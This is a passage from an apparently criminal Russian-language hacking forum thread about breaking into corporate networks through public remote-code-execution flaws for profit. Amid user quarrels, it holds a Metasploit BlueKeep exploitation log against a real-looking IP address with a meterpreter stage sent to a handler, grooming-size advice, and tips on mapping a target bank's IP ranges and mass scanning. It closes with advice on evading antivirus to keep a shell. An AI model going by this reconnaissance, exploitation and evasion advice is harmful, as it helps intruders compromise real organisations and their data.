Статья Добываем доступы в корпы через паблик RCE

[na5harussia]

Ну если ты с основного ака говорить не хочешь и при этом "в теме" ты же понимаешь какое значение имеют слова только что регнувшегося человека.
Так что процитирую тебя мозги не е#и

Похуй. Главное что думают люди, верно?

 

[buyacc]

Похуй. Главное что думают люди, верно?

Какие люди? Что думают? Новокек рассказывает что думают какие то люди.
Лихая шутка)

 

[na5harussia]

Какие люди? Что думают? Новокек рассказывает что думают какие то люди.
Лихая шутка)

Я о тебе был лучшего мнения, а ты или дурак или прикидываешься сейчас, надеюсь прикидываешься.

 

[boriselcin]

Все слова настеньки это шняга с залупы коня и она ее нихуает или курит)))
я оставлю это тут снимок датирован 23 июня
стабильная стата за одну ночь) блюкип умер - все, он начал умирать как только я создал эту тему, как и все остальное как пульсы (когда тему создал бастрелорд)

 

[boriselcin]

PS

na5harussia можно банить, человек публично признался что у него есть еще акк тут)​

 

[buyacc]

Я о тебе был лучшего мнения, а ты или дурак или прикидываешься сейчас, надеюсь прикидываешся

Настюш, переживу)

 

[dictat0r]

i get a lot of these but no sessions
*] Exploiting target 109.104.20.198
[*] 109.104.20.198:3390 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[+] 109.104.20.198:3390 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 109.104.20.198:3390 - Scanned 1 of 1 hosts (100% complete)
[*] 109.104.20.198:3390 - Using CHUNK grooming strategy. Size 100MB, target address 0xfffffa8009c00000, Channel count 1.
[!] 109.104.20.198:3390 - <---------------- | Entering Danger Zone | ---------------->
[*] 109.104.20.198:3390 - Surfing channels ...
[*] 109.104.20.198:3390 - Lobbing eggs ...


meterpreter i think is setup correctly
msf6 exploit(multi/handler) >
[*] Sending stage (200266 bytes) to *censored*
sessions

Active sessions
===============

No active sessions.

 

[Zer0goaway]

Продам впс'ы за копейки

 

[vurnlb1x]

Which groomsize is best taken?

 

[mnsl202]

Which groomsize is best taken?

150

 

[mzfkcc]

Борька красавец, все кто ноет о том, что нереально заработать, они и работать не хотят. В теме сеток всего 3 недели, только-только пошли первые деньги, и уже понимаю, что даже банальной продажей можно столько зарабытывать. В общем, Боре респект за тему, хоть и не стал пробовать(денег не было на впс, а сейчас и смыла не вижу особо), остальным соболезную_))

все перепахано уже там бандами негров. Для себя дедиков (нахрена то..) можно взять но в работу.. такое..

 

[boriselcin]

https://xss.pro/threads/47256/ хехе))) кто то крошки собирает еще

 

[89t0rIhnt]

Благодарю за статью)

 

[HellishMadonna]

Настюш, переживу)

PS

na5harussia можно банить, человек публично признался что у него есть еще акк тут)​

ебать вы похлеще Нэвэльного расследование замутили, задавили авторитетом и выпилили отсюда мне даже жаль ее немного, она же даже пыталась сопротивляться?

 

[kamzzzzz]

ебать вы похлеще Нэвэльного расследование замутили, задавили авторитетом и выпилили отсюда мне даже жаль ее немного, она же даже пыталась сопротивляться?

Владэмир Владэмирович, разлогиньтесь, Вам на другой форум надо

 

[Boro]

https://xss.pro/threads/47256/ хехе))) кто то крошки собирает еще

Подскажи что такое депы ип адресов и где их брать? Нужен акк шодана как я понимаю или товарищ с таким аком?

 

[Kail Battler]

Подскажи что такое депы ип адресов и где их брать? Нужен акк шодана как я понимаю или товарищ с таким аком?

1. Это диапазоны ip-адрессов, которые нужны для сканирования на наличие уязвимого сервиса/ПО и получиние точки входа. В интернете все ip-адреса распределены (кроме серых) по-странам. Где их брать? -Все ip-адреса выдаются специальными организациями (вроде RIPE), их можно просто нагуглить (Пример1) или вот (Пример2). Второй сайт позволяет искать по whois имени. Этот запрос ищёт whois записи, в которых встречается "Bank Of America". Это может быть полезно, если нужно найти ip-диапазоны конкретных организаций.
2. Пользоваться шоданом или нет - дело ваше. Просто там есть фильтр по странам (если аккаунт зарегистрирован), а если есть платная подписка - он выдаёт больше результатов. Помимо шодана знаю Censys, слышал про аналогичные проекты. Можно делать как ТС, покупать VPS отдельно под скан, ставить masscan и сканировать. Это всё только инструменты.

 

[Kail Battler]

Борька красавец, все кто ноет о том, что нереально заработать, они и работать не хотят. В теме сеток всего 3 недели, только-только пошли первые деньги, и уже понимаю, что даже банальной продажей можно столько зарабытывать. В общем, Боре респект за тему, хоть и не стал пробовать(денег не было на впс, а сейчас и смыла не вижу особо), остальным соболезную_))

1. Какие знания в основном нужны? Стандартных методик по пентесту и пост-эксплуатации хватит или нужно что-то специфическое?
2. Какой опыт нужен и сколько времени на это уходит, сколько компаний в день можете пробить?

 

[l3g0las]

1. Какие знания в основном нужны? Стандартных методик по пентесту и пост-эксплуатации хватит или нужно что-то специфическое?
2. Какой опыт нужен и сколько времени на это уходит, сколько компаний в день можете пробить?

Конкретно ничего не подскажу, в моём случае очень большой разброс, иногда бывает и 5-6 корп в день, а бывает и 0. Чем больше изучаю материалов по теме, тем больше могу могу самостоятельно отработать.

 

[apollo55]

Новичкам вроде меня следует подумать об изучении базового обхода антивируса, чтобы получить оболочку и установить постоянство в целевой системе.
Не надейтесь на стандартные полезные нагрузки msfvenom или cobalt strike по умолчанию.
Не загружайте свои образцы в virustotal или другой, просто тестируйте на виртуальной машине с отключением отправки образца вредоносного ПО в облако.
проверьте это тоже с включенным антивирусом.
Это нестандартная полезная нагрузка, я успешно получил оболочку